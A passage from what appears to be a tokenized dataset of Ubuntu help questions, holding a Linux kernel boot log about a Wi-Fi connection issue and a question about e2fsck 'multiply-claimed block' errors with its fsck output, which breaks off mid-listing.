: xhci host controller [ 1.930267 ] usb usb8 : manufacturer : linux 3.8.0-19-generic xhci_hcd [ 1.930269 ] usb usb8 : serialnumber : 0000:02:00.0 [ 1.930318 ] xhci xhci_add_endpoint called for root hub [ 1.930320 ] xhci xhci_check_bandwidth called for root hub [ 1.930332 ] hub 8-0:1.0 : usb hub found [ 1.930337 ] hub 8-0:1.0 : 2 ports detected [ 1.930379 ] xhci_hcd 0000:02:00.0 : xhci host controller [ 1.930382 ] xhci_hcd 0000:02:00.0 : new usb bus registered , assigned bus number 9 [ 1.930398 ] usb usb9 : new usb device found , idvendor=1d6b , idproduct=0003 [ 1.930399 ] usb usb9 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.930401 ] usb usb9 : product : xhci host controller [ 1.930402 ] usb usb9 : manufacturer : linux 3.8.0-19-generic xhci_hcd [ 1.930403 ] usb usb9 : serialnumber : 0000:02:00.0 [ 1.930447 ] xhci xhci_add_endpoint called for root hub [ 1.930448 ] xhci xhci_check_bandwidth called for root hub [ 1.930460 ] hub 9-0:1.0 : usb hub found [ 1.930464 ] hub 9-0:1.0 : 2 ports detected [ 1.930577 ] xhci_hcd 0000:04:00.0 : xhci host controller [ 1.930584 ] xhci_hcd 0000:04:00.0 : new usb bus registered , assigned bus number 10 [ 1.930690 ] xhci_hcd 0000:04:00.0 : irq 45 for msi/msi-x [ 1.930731 ] usb usb10 : new usb device found , idvendor=1d6b , idproduct=0002 [ 1.930733 ] usb usb10 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.930735 ] usb usb10 : product : xhci host controller [ 1.930736 ] usb usb10 : manufacturer : linux 3.8.0-19-generic xhci_hcd [ 1.930738 ] usb usb10 : serialnumber : 0000:04:00.0 [ 1.930791 ] xhci xhci_add_endpoint called for root hub [ 1.930792 ] xhci xhci_check_bandwidth called for root hub [ 1.930808 ] hub 10-0:1.0 : usb hub found [ 1.930813 ] hub 10-0:1.0 : 2 ports detected [ 1.930863 ] xhci_hcd 0000:04:00.0 : xhci host controller [ 1.930866 ] xhci_hcd 0000:04:00.0 : new usb bus registered , assigned bus number 11 [ 1.930882 ] usb usb11 : new usb device found , idvendor=1d6b , idproduct=0003 [ 1.930884 ] usb usb11 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.930885 ] usb usb11 : product : xhci host controller [ 1.930886 ] usb usb11 : manufacturer : linux 3.8.0-19-generic xhci_hcd [ 1.930888 ] usb usb11 : serialnumber : 0000:04:00.0 [ 1.930934 ] xhci xhci_add_endpoint called for root hub [ 1.930935 ] xhci xhci_check_bandwidth called for root hub [ 1.930949 ] hub 11-0:1.0 : usb hub found [ 1.930953 ] hub 11-0:1.0 : 2 ports detected [ 1.931090 ] i8042 : pnp : no ps/2 controller found . probing ports directly . [ 1.963590 ] i8042 : failed to disable aux port , but continuing anyway ... is this a sis ? [ 1.963591 ] i8042 : if aux port is really absent please use the 'i8042.noaux ' option [ 2.213155 ] serio : i8042 kbd port at 0x60,0x64 irq 1 [ 2.213245 ] mousedev : ps/2 mouse device common for all mice [ 2.213355 ] rtc_cmos 00:04 : rtc can wake from s4 [ 2.213453 ] rtc_cmos 00:04 : rtc core : registered rtc_cmos as rtc0 [ 2.213483 ] rtc0 : alarms up to one month , 242 bytes nvram , hpet irqs [ 2.213548 ] device-mapper : uevent : version 1.0.3 [ 2.213599 ] device-mapper : ioctl : 4.23.1-ioctl ( 2012-12-18 ) initialised : dm-devel @ redhat.com [ 2.213638 ] cpuidle : using governor ladder [ 2.213694 ] cpuidle : using governor menu [ 2.213698 ] ledtrig-cpu : registered to indicate activity on cpus [ 2.213699 ] efi variables facility v0.08 2004-may-17 [ 2.213864 ] ashmem : initialized [ 2.213950 ] tcp : cubic registered [ 2.214019 ] net : registered protocol family 10 [ 2.214141 ] net : registered protocol family 17 [ 2.214147 ] key type dns_resolver registered [ 2.214394 ] loading module verification certificates [ 2.215129 ] modsign : loaded cert 'magrathea : glacier signing key : 4fb521df0b0fa81f775431361b8076d5d0f1869a' [ 2.215136 ] registered taskstats version 1 [ 2.217769 ] key type trusted registered [ 2.219501 ] key type encrypted registered [ 2.221299 ] rtc_cmos 00:04 : setting system clock to 2013-10-03 15:35:21 utc ( 1380814521 ) [ 2.221335 ] powernow-k8 : this cpu is not supported anymore , using acpi-cpufreq instead . [ 2.222140 ] acpi-cpufreq : overriding bios provided _psd data [ 2.222320 ] bios edd facility v0.16 2004-jun-25 , 0 devices found [ 2.222321 ] edd information not available . [ 2.224333 ] freeing unused kernel memory : 992k freed [ 2.224504 ] write protecting the kernel read-only data : 12288k [ 2.228992 ] freeing unused kernel memory : 1176k freed [ 2.232929 ] freeing unused kernel memory : 1080k freed [ 2.243505 ] udevd [ 109 ] : starting version 175 [ 2.267637 ] disabling lock debugging due to kernel taint [ 2.268090 ] ahci 0000:00:11.0 : version 3.0 [ 2.268385 ] ahci 0000:00:11.0 : ahci 0001.0100 32 slots 4 ports 3 gbps 0xf impl sata mode [ 2.268389 ] ahci 0000:00:11.0 : flags : 64bit ncq sntf ilck pm led clo pmp pio slum part ccc [ 2.268729 ] r8169 gigabit ethernet driver 2.3lk-napi loaded [ 2.268945 ] r8169 0000:03:00.0 : irq 46 for msi/msi-x [ 2.268959 ] wmi : mapper loaded [ 2.269531 ] scsi0 : ahci [ 2.269651 ] scsi1 : ahci [ 2.270660 ] r8169 0000:03:00.0 eth0 : rtl8168evl/8111evl at 0xffffc90001872000 , 90:2b:34:99:02 : f3 , xid 0c900800 irq 46 [ 2.270663 ] r8169 0000:03:00.0 eth0 : jumbo features [ frames : 9200 bytes , tx checksumming : ko ] [ 2.271131 ] scsi2 : ahci [ 2.271256 ] scsi3 : ahci [ 2.271294 ] ata1 : sata max udma/133 abar m1024 @ 0xfe02f000 port 0xfe02f100 irq 22 [ 2.271298 ] ata2 : sata max udma/133 abar m1024 @ 0xfe02f000 port 0xfe02f180 irq 22 [ 2.271300 ] ata3 : sata max udma/133 abar m1024 @ 0xfe02f000 port 0xfe02f200 irq 22 [ 2.271303 ] ata4 : sata max udma/133 abar m1024 @ 0xfe02f000 port 0xfe02f280 irq 22 [ 2.279556 ] [ drm ] initialized drm 1.1.0 20060810 [ 2.281031 ] scsi4 : pata_atiixp [ 2.287482 ] scsi5 : pata_atiixp [ 2.287825 ] ata5 : pata max udma/100 cmd 0x1f0 ctl 0x3f6 bmdma 0xfa00 irq 14 [ 2.287827 ] ata6 : pata max udma/100 cmd 0x170 ctl 0x376 bmdma 0xfa08 irq 15 [ 2.299045 ] [ drm ] vgacon disable radeon kernel modesetting . [ 2.299581 ] [ drm ] supports vblank timestamp caching rev 1 ( 10.10.2010 ) . [ 2.299583 ] [ drm ] no driver support for vblank timestamp query . [ 2.299585 ] [ drm ] initialized radeon 1.33.0 20080528 for 0000:01:00.0 on minor 0 [ 2.465133 ] ata6.00 : ata-8 : wdc wd10eadx-00tdhb0 , 77.04d77 , max udma/133 [ 2.465136 ] ata6.00 : 1953525168 sectors , multi 16 : lba48 ncq ( depth 0/32 ) [ 2.465154 ] ata6.01 : atapi : tsstcorp cddvdw sh-222bb , sb00 , max udma/100 [ 2.481165 ] ata6.00 : configured for udma/100 [ 2.496663 ] ata6.01 : configured for udma/100 [ 2.552143 ] tsc : refined tsc clocksource calibration : 4218.660 mhz [ 2.552154 ] switching to clocksource tsc [ 2.560109 ] usb 2-4 : new high-speed usb device number 3 using ehci-pci [ 2.588037 ] ata1 : sata link down ( sstatus 0 scontrol 300 ) [ 2.588081 ] ata2 : sata link down ( sstatus 0 scontrol 300 ) [ 2.592023 ] ata3 : sata link down ( sstatus 0 scontrol 300 ) [ 2.592070 ] ata4 : sata link down ( sstatus 0 scontrol 300 ) [ 2.592305 ] scsi 5:0:0:0 : direct-access ata wdc wd10eadx-00t 77.0 pq : 0 ansi : 5 [ 2.592413 ] sd 5:0:0:0 : [ sda ] 1953525168 512-byte logical blocks : ( 1.00 tb/931 gib ) [ 2.592457 ] sd 5:0:0:0 : attached scsi generic sg0 type 0 [ 2.592475 ] sd 5:0:0:0 : [ sda ] write protect is off [ 2.592478 ] sd 5:0:0:0 : [ sda ] mode sense : 00 3a 00 00 [ 2.592509 ] sd 5:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 2.595006 ] scsi 5:0:1:0 : cd-rom tsstcorp cddvdw sh-222bb sb00 pq : 0 ansi : 5 [ 2.623589 ] sr0 : scsi3-mmc drive : 16x/16x writer dvd-ram cd/rw xa/form2 cdda tray [ 2.623595 ] cdrom : uniform cd-rom driver revision : 3.20 [ 2.623784 ] sr 5:0:1:0 : attached scsi cd-rom sr0 [ 2.623847 ] sr 5:0:1:0 : attached scsi generic sg1 type 5 [ 2.631839 ] sda : sda1 sda2 < sda5 > [ 2.634092 ] sd 5:0:0:0 : [ sda ] attached scsi disk [ 2.692705 ] usb 2-4 : new usb device found , idvendor=0781 , idproduct=5567 [ 2.692708 ] usb 2-4 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 2.692710 ] usb 2-4 : product : cruzer blade [ 2.692711 ] usb 2-4 : manufacturer : sandisk [ 2.692712 ] usb 2-4 : serialnumber : 20051739220c80c0562b [ 2.694391 ] initializing usb mass storage driver ... [ 2.694517 ] scsi6 : usb-storage 2-4:1.0 [ 2.694564 ] usbcore : registered new interface driver usb-storage [ 2.694566 ] usb mass storage support registered . [ 2.954916 ] usb 5-3 : new low-speed usb device number 2 using ohci_hcd [ 3.131394 ] usb 5-3 : new usb device found , idvendor=1c4f , idproduct=0002 [ 3.131401 ] usb 5-3 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 3.131406 ] usb 5-3 : product : usb keykoard [ 3.131410 ] usb 5-3 : manufacturer : usb [ 3.147361 ] usbcore : registered new interface driver usbhid [ 3.147364 ] usbhid : usb hid core driver [ 3.149515 ] input : usb usb keykoard as /devices/pci0000:00/0000:00:13.0/usb5/5-3/5-3:1.0/input/input2 [ 3.149872 ] hid-generic 0003:1c4f:0002.0001 : input , hidraw0 : usb hid v1.10 keyboard [ usb usb keykoard ] on usb-0000:00:13.0-3/input0 [ 3.150031 ] input : usb usb keykoard as /devices/pci0000:00/0000:00:13.0/usb5/5-3/5-3:1.1/input/input3 [ 3.150095 ] hid-generic 0003:1c4f:0002.0002 : input , hidraw1 : usb hid v1.10 device [ usb usb keykoard ] on usb-0000:00:13.0-3/input1 [ 3.265976 ] usb 3-2 : new low-speed usb device number 2 using ohci_hcd [ 3.430487 ] usb 3-2 : new usb device found , idvendor=093a , idproduct=2521 [ 3.430495 ] usb 3-2 : new usb device strings : mfr=0 , product=2 , serialnumber=0 [ 3.430500 ] usb 3-2 : product : usb optical mouse [ 3.440743 ] input : usb optical mouse as /devices/pci0000:00/0000:00:12.0/usb3/3-2/3-2:1.0/input/input4 [ 3.440839 ] hid-generic 0003:093a:2521.0003 : input , hidraw2 : usb hid v1.11 mouse [ usb optical mouse ] on usb-0000:00:12.0-2/input0 [ 3.689354 ] scsi 6:0:0:0 : direct-access sandisk cruzer blade 1.26 pq : 0 ansi : 5 [ 3.689826 ] sd 6:0:0:0 : attached scsi generic sg2 type 0 [ 3.691091 ] sd 6:0:0:0 : [ sdb ] 7821312 512-byte logical blocks : ( 4.00 gb/3.72 gib ) [ 3.692165 ] sd 6:0:0:0 : [ sdb ] write protect is off [ 3.692169 ] sd 6:0:0:0 : [ sdb ] mode sense : 43 00 00 00 [ 3.693092 ] sd 6:0:0:0 : [ sdb ] write cache : disabled , read cache : enabled , does n't support dpo or fua [ 3.697979 ] sdb : sdb1 [ 3.700578 ] usb 3-3 : new full-speed usb device number 3 using ohci_hcd [ 3.701453 ] sd 6:0:0:0 : [ sdb ] attached scsi removable disk [ 3.873058 ] usb 3-3 : new usb device found , idvendor=046d , idproduct=c52e [ 3.873060 ] usb 3-3 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 3.873061 ] usb 3-3 : product : usb receiver [ 3.873061 ] usb 3-3 : manufacturer : logitech [ 3.881196 ] input : logitech usb receiver as /devices/pci0000:00/0000:00:12.0/usb3/3-3/3-3:1.0/input/input5 [ 3.881270 ] hid-generic 0003:046d : c52e.0004 : input , hidraw3 : usb hid v1.11 keyboard [ logitech usb receiver ] on usb-0000:00:12.0-3/input0 [ 3.886310 ] input : logitech usb receiver as /devices/pci0000:00/0000:00:12.0/usb3/3-3/3-3:1.1/input/input6 [ 3.886531 ] hid-generic 0003:046d : c52e.0005 : input , hiddev0 , hidraw4 : usb hid v1.11 mouse [ logitech usb receiver ] on usb-0000:00:12.0-3/input1 [ 16.349513 ] bio : create slab < bio-1 > at 1 [ 16.514292 ] bio : create slab < bio-1 > at 1 [ 22.566523 ] ext4-fs ( dm-1 ) : info : recovery required on readonly filesystem [ 22.566526 ] ext4-fs ( dm-1 ) : write access will be enabled during recovery [ 23.641340 ] ext4-fs ( dm-1 ) : orphan cleanup on readonly fs [ 23.641346 ] ext4-fs ( dm-1 ) : ext4_orphan_cleanup : deleting unreferenced inode 44564502 [ 23.641368 ] ext4-fs ( dm-1 ) : ext4_orphan_cleanup : deleting unreferenced inode 44564501 [ 23.641374 ] ext4-fs ( dm-1 ) : ext4_orphan_cleanup : deleting unreferenced inode 44564500 [ 23.641380 ] ext4-fs ( dm-1 ) : ext4_orphan_cleanup : deleting unreferenced inode 40109593 [ 23.641409 ] ext4-fs ( dm-1 ) : ext4_orphan_cleanup : deleting unreferenced inode 44564499 [ 23.641415 ] ext4-fs ( dm-1 ) : ext4_orphan_cleanup : deleting unreferenced inode 44564498 [ 23.641421 ] ext4-fs ( dm-1 ) : ext4_orphan_cleanup : deleting unreferenced inode 2621752 [ 23.641458 ] ext4-fs ( dm-1 ) : ext4_orphan_cleanup : deleting unreferenced inode 2621651 [ 23.641468 ] ext4-fs ( dm-1 ) : ext4_orphan_cleanup : deleting unreferenced inode 44564497 [ 23.641479 ] ext4-fs ( dm-1 ) : ext4_orphan_cleanup : deleting unreferenced inode 44564496 [ 23.641490 ] ext4-fs ( dm-1 ) : ext4_orphan_cleanup : deleting unreferenced inode 44564495 [ 23.641500 ] ext4-fs ( dm-1 ) : ext4_orphan_cleanup : deleting unreferenced inode 44564494 [ 23.641515 ] ext4-fs ( dm-1 ) : ext4_orphan_cleanup : deleting unreferenced inode 44564493 [ 23.641525 ] ext4-fs ( dm-1 ) : ext4_orphan_cleanup : deleting unreferenced inode 2621640 [ 23.641535 ] ext4-fs ( dm-1 ) : 14 orphan inodes deleted [ 23.641536 ] ext4-fs ( dm-1 ) : recovery complete [ 23.773271 ] ext4-fs ( dm-1 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 26.714729 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 27.014172 ] udevd [ 504 ] : starting version 175 [ 27.343988 ] ext4-fs ( dm-1 ) : re-mounted . opts : errors=remount-ro [ 28.564859 ] lp : driver loaded but no devices found [ 29.267383 ] parport_pc 00:08 : reported by plug and play acpi [ 29.267435 ] parport0 : pc-style at 0x378 , irq 7 [ pcspp , tristate ] [ 29.363116 ] lp0 : using parport0 ( interrupt-driven ) . [ 29.425148 ] ppdev : user-space parallel port driver [ 29.426077 ] mce : in-kernel mce decoding enabled . [ 29.504277 ] edac mc : ver : 3.0.0 [ 29.590044 ] amd64 edac driver v3.4.0 [ 29.590065 ] edac amd64 : dram ecc disabled . [ 29.590071 ] edac amd64 : ecc disabled in the bios or no ecc capability , module will not load . [ 29.590071 ] either enable ecc checking or force module loading by setting 'ecc_enable_override ' . [ 29.590071 ] ( note that use of the override may cause unknown side effects . ) [ 29.596682 ] acpi warning : 0x0000000000000b00-0x0000000000000b07 systemio conflicts with region \sor1 1 ( 20121018/utaddress-251 ) [ 29.596687 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 29.612131 ] microcode : cpu0 : patch_level=0x06000626 [ 29.701156 ] sp5100_tco : sp5100/sb800 tco watchdog timer driver v0.05 [ 29.701195 ] sp5100_tco : pci revision id : 0x3c [ 29.701211 ] sp5100_tco : failed to find mmio address , giving up . [ 30.001882 ] microcode : cpu0 : new patch_level=0x06000629 [ 30.001892 ] microcode : cpu1 : patch_level=0x06000626 [ 30.001900 ] microcode : cpu2 : patch_level=0x06000626 [ 30.012295 ] microcode : cpu2 : new patch_level=0x06000629 [ 30.012304 ] microcode : cpu3 : patch_level=0x06000626 [ 30.012601 ] microcode : microcode update driver : v2.00 < tigran @ aivazian.fsnet.co.uk > , peter oruba [ 31.853776 ] kvm : disabled by bios [ 31.855990 ] kvm : disabled by bios [ 31.860270 ] kvm : disabled by bios [ 31.863998 ] kvm : disabled by bios [ 31.976456 ] cfg80211 : calling crda to update world regulatory domain [ 32.469245 ] input : hda ati sb line as /devices/pci0000:00/0000:00:14.2/sound/card0/input7 [ 32.469319 ] input : hda ati sb front mic as /devices/pci0000:00/0000:00:14.2/sound/card0/input8 [ 32.469379 ] input : hda ati sb rear mic as /devices/pci0000:00/0000:00:14.2/sound/card0/input9 [ 32.469438 ] input : hda ati sb front headphone as /devices/pci0000:00/0000:00:14.2/sound/card0/input10 [ 32.469496 ] input : hda ati sb line out as /devices/pci0000:00/0000:00:14.2/sound/card0/input11 [ 32.469779 ] hda-intel 0000:01:00.1 : handle vga-switcheroo audio client [ 32.469838 ] snd_hda_intel 0000:01:00.1 : irq 47 for msi/msi-x [ 32.572904 ] input : hd-audio generic hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:02.0/0000:01:00.1/sound/card1/input12 [ 33.004984 ] ieee80211 phy0 : selected rate control algorithm 'minstrel_ht' [ 33.712398 ] ext2-fs ( sda1 ) : warning : mounting unchecked fs , running e2fsck is recommended [ 33.736739 ] cfg80211 : world regulatory domain updated : [ 33.736741 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 33.736743 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 33.736744 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 33.736746 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 33.736747 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 33.736748 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 34.113263 ] type=1400 audit ( 1380814553.485:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=886 comm= '' apparmor_parser '' [ 34.113313 ] type=1400 audit ( 1380814553.485:3 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=1023 comm= '' apparmor_parser '' [ 34.113321 ] type=1400 audit ( 1380814553.485:4 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=905 comm= '' apparmor_parser '' [ 34.113712 ] type=1400 audit ( 1380814553.485:5 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=886 comm= '' apparmor_parser '' [ 34.113760 ] type=1400 audit ( 1380814553.485:6 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=1023 comm= '' apparmor_parser '' [ 34.113767 ] type=1400 audit ( 1380814553.485:7 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=905 comm= '' apparmor_parser '' [ 34.113952 ] type=1400 audit ( 1380814553.485:8 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=886 comm= '' apparmor_parser '' [ 34.114011 ] type=1400 audit ( 1380814553.485:9 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=1023 comm= '' apparmor_parser '' [ 34.114017 ] type=1400 audit ( 1380814553.485:10 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=905 comm= '' apparmor_parser '' [ 35.349305 ] init : failsafe main process ( 1060 ) killed by term signal [ 36.283172 ] type=1400 audit ( 1380814555.661:11 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=1148 comm= '' apparmor_parser '' [ 37.461643 ] bluetooth : core ver 2.16 [ 37.461658 ] net : registered protocol family 31 [ 37.461660 ] bluetooth : hci device and connection manager initialized [ 37.461666 ] bluetooth : hci socket layer initialized [ 37.461668 ] bluetooth : l2cap socket layer initialized [ 37.461673 ] bluetooth : sco socket layer initialized [ 37.566494 ] bluetooth : rfcomm tty layer initialized [ 37.566502 ] bluetooth : rfcomm socket layer initialized [ 37.566503 ] bluetooth : rfcomm ver 1.11 [ 37.744700 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 37.744703 ] bluetooth : bnep filters : protocol multicast [ 37.744710 ] bluetooth : bnep socket layer initialized [ 38.350122 ] init : avahi-cups-reload main process ( 1271 ) terminated with status 1 [ 38.619045 ] vboxdrv : found 4 processor cores . [ 38.619274 ] vboxdrv : fasync=0 offmin=0x60b offmax=0x4018 [ 38.619748 ] vboxdrv : tsc mode is 'synchronous ' , kernel timer mode is 'normal ' . [ 38.619750 ] vboxdrv : successfully loaded version 4.2.10_ubuntu ( interface 0x001a0004 ) . [ 38.982517 ] vboxpci : iommu not found ( not registered ) [ 41.236237 ] init : udev-fallback-graphics main process ( 1518 ) terminated with status 1 [ 42.158520 ] r8169 0000:03:00.0 eth0 : link down [ 42.158555 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 42.158604 ] r8169 0000:03:00.0 eth0 : link down [ 42.158803 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 42.292268 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 42.292463 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 42.850789 ] adding 16756732k swap on /dev/mapper/cryptswap1 . priority : -1 extents:1 across:16756732k [ 43.657550 ] r8169 0000:03:00.0 eth0 : link up [ 43.657557 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready [ 76.699326 ] iso 9660 extensions : microsoft joliet level 3 [ 76.895853 ] isofs : changing to secondary root [ 121.622347 ] r8169 0000:03:00.0 eth0 : link down [ 126.439702 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 126.570751 ] r8169 0000:03:00.0 eth0 : link up [ 126.570760 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready [ 276.381016 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 280.173733 ] wlan0 : authenticate with 00:26:4d:6f : b6:90 [ 280.221303 ] wlan0 : send auth to 00:26:4d:6f : b6:90 ( try 1/3 ) [ 280.229562 ] wlan0 : authenticated [ 280.229708 ] rt2800pci 0000:05:06.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 280.229722 ] rt2800pci 0000:05:06.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 280.233187 ] wlan0 : associate with 00:26:4d:6f : b6:90 ( try 1/3 ) [ 280.260115 ] wlan0 : rx assocresp from 00:26:4d:6f : b6:90 ( capab=0x401 status=0 aid=2 ) [ 280.260310 ] wlan0 : associated [ 280.260341 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 280.260424 ] cfg80211 : calling crda for country : de [ 280.263538 ] cfg80211 : regulatory domain changed to country : de [ 280.263540 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 280.263542 ] cfg80211 : ( 2400000 khz - 2483500 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 280.263543 ] cfg80211 : ( 5150000 khz - 5250000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 280.263544 ] cfg80211 : ( 5250000 khz - 5350000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 280.263546 ] cfg80211 : ( 5470000 khz - 5725000 khz @ 40000 khz ) , ( n/a , 2698 mbm ) note : the network i am trying to connect to is an unsecure network
353197	do i have to worry about fsck error `` multiply-claimed block ( s ) ''	here is my fsck output : ~ $ sudo fsck -vf /dev/sda5 fsck from util-linux 2.20.1 e2fsck 1.42.5 ( 29-jul-2012 ) pass 1 : checking inodes , blocks , and sizes running additional passes to resolve blocks claimed by more than one inode ... pass 1b : rescanning for multiply-claimed blocks multiply-claimed block ( s ) in inode 447649 : 7803583 multiply-claimed block ( s ) in inode 787816 : 3154048 multiply-claimed block ( s ) in inode 788743 : 3154049 multiply-claimed block ( s ) in inode 788746 : 3154050 multiply-claimed block ( s ) in inode 790435 : 3154051 multiply-claimed block ( s ) in inode 799849 : 3154052 multiply-claimed block ( s ) in inode 799860 : 3154054 multiply-claimed block ( s ) in inode 803622 : 3154055 multiply-claimed block ( s ) in inode 809786 : 3154056 multiply-claimed block ( s ) in inode 809796 : 3154057 multiply-claimed block ( s ) in inode 809804 : 3154058 multiply-claimed block ( s ) in inode 810089 : 3154060 multiply-claimed block ( s ) in inode 811328 : 3154061 multiply-claimed block ( s ) in inode 816753 : 3154062 multiply-claimed block ( s ) in inode 945772 : 3154048 3154049 3154050 3154051 3154052 3154054 3154055 3154056 3154057 3154058 3154060 3154061 3154062 multiply-claimed block ( s ) in inode 953954 : 2686393 multiply-claimed block ( s ) in inode 961043 : 4204736 4204737 4204738 4204739 4204740 multiply-claimed block ( s ) in inode 1069093 : 4204736 multiply-claimed block ( s ) in inode 1069107 : 4204737 multiply-claimed block ( s ) in inode 1069125 : 4204738 multiply-claimed block ( s ) in inode 1072839 : 4204739 multiply-claimed block ( s ) in inode 1074788 : 4204740 multiply-claimed block ( s ) in inode 1228300 : 7148415 multiply-claimed block ( s ) in inode 1229036 : 7720477 multiply-claimed block ( s ) in inode 1231483 : 7783679 multiply-claimed block ( s ) in inode 1231493 : 7789279 multiply-claimed block ( s ) in inode 1231495 : 7789535 multiply-claimed block ( s ) in inode 1231497 : 7789567 multiply-claimed block ( s ) in inode 1231553 : 7797043 multiply-claimed block ( s ) in inode 1231555 : 7798085 multiply-claimed block ( s ) in inode 1231557 : 7798089 multiply-claimed block ( s ) in inode 1231559 : 7798207 multiply-claimed block ( s ) in inode 1231562 : 7798208 multiply-claimed block ( s ) in inode 1231565 : 7798245 multiply-claimed block ( s ) in inode 1231570 : 7798248 multiply-claimed block ( s ) in inode 1231575 : 7797202 multiply-claimed block ( s ) in inode 1231577 : 7797203 multiply-claimed block ( s ) in inode 1231579 : 7798204 multiply-claimed block ( s ) in inode 1231581 : 7798205 multiply-claimed block ( s ) in inode 1231583 : 7798242 multiply-claimed block ( s ) in inode 1231585 : 7798243 multiply-claimed block ( s ) in inode 1231589 : 7798265 multiply-claimed block ( s ) in inode 1231629 : 7803583 multiply-claimed block ( s ) in inode 1231865 : 7807615 multiply-claimed block ( s ) in inode 1231867 : 7807903 multiply-claimed block ( s ) in inode 1231918 : 7808031 multiply-claimed block ( s ) in inode 1231949 : 7809679 multiply-claimed block ( s ) in inode 1238918 : 2686393 multiply-claimed block ( s ) in inode 1341801 : 7720477 multiply-claimed block ( s ) in inode 1579279 : 7789279 7789535 7789567 multiply-claimed block ( s ) in inode 1579442 : 7797043 7797202 7797203 multiply-claimed block ( s ) in inode 1583545 : 7783679 multiply-claimed block ( s ) in inode 1586086 : 7148415 multiply-claimed block ( s ) in inode 1591119 : 7807615 7807903 7808031 multiply-claimed block ( s ) in inode 1597957 : 7798085 7798089 7798204 7798205 7798207 7798208 7798242 7798243 7798245 7798248 7798265 7809679 pass 1c : scanning directories for inodes with multiply-claimed blocks pass 1d : reconciling multiply-claimed blocks ( there are 55 inodes containing multiply-claimed blocks . ) file /lost+found/ # 447649 ( inode # 447649 , mod time thu aug 15 02:23:14 2013 ) has 1 multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . file /lost+found/ # 945772 ( inode # 945772 , mod time fri apr 19 22:45:15 2013 ) has 13 multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . file /lost+found/ # 953954 ( inode # 953954 , mod time thu jul 18 17:09:04 2013 ) has 1 multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . file /lost+found/ # 961043 ( inode # 961043 , mod time fri may 17 12:23:14 2013 ) has 5 multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . file /lost+found/ # 1842491/ip_set_list.h ( inode # 1341801 , mod time fri aug 23 17:17:57 2013 ) has 1 multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . file /lost+found/ # 1579279 ( inode # 1579279 , mod time thu jun 13 13:01:32 2013 ) has 3 multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . file /lost+found/ # 1579442 ( inode # 1579442 , mod time thu jun 13 13:01:05 2013 ) has 3 multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . file /lost+found/ # 1583545 ( inode # 1583545 , mod time thu jul 18 22:24:29 2013 ) has 1 multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . file /lost+found/ # 1586086 ( inode # 1586086 , mod time wed aug 21 11:44:18 2013 ) has 1 multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . file /lost+found/ # 1591119 ( inode # 1591119 , mod time wed jul 24 17:19:12 2013 ) has 3 